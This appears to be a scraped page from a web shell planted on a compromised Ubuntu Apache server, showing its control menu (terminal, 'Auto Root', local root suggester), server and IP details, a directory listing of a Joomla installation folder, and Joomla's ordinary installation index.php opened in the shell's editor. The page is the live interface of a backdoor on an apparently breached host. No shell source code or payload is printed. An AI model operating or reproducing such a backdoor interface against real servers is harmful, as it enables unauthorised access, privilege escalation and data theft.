Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
teste /
installation /
Delete
Unzip
Name
Size
Permission
Date
Action
application
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
cache
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
controller
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
form
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
helper
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
html
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
language
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
model
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
response
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
sql
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
template
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
view
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
COPYRIGHT
880
B
-rw-r--r--
2017-10-04 08:52
CREDITS
571
B
-rw-r--r--
2017-10-04 08:52
INSTALL
4.45
KB
-rw-r--r--
2017-10-04 08:52
LICENSES
29.69
KB
-rw-r--r--
2017-10-04 08:52
configuration.php-dist
4.89
KB
-rw-r--r--
2017-10-04 08:52
favicon.ico
1.97
KB
-rw-r--r--
2017-10-04 08:52
index.php
978
B
-rw-r--r--
2017-10-04 08:52
localise.xml
200
B
-rw-r--r--
2017-10-04 08:52
Save
Rename
<?php /** * @package Joomla.Installation * * @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * Define the application's minimum supported PHP version as a constant so it can be referenced within the application. */ define('JOOMLA_MINIMUM_PHP', '5.3.10'); if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<')) { die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!'); } /** * Constant that is checked in included files to prevent direct access. * define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower */ define('_JEXEC', 1); // Bootstrap the application require_once __DIR__ . '/application/bootstrap.php'; // Get the application $app = JApplicationWeb::getInstance('InstallationApplicationWeb'); // Execute the application $app->execute();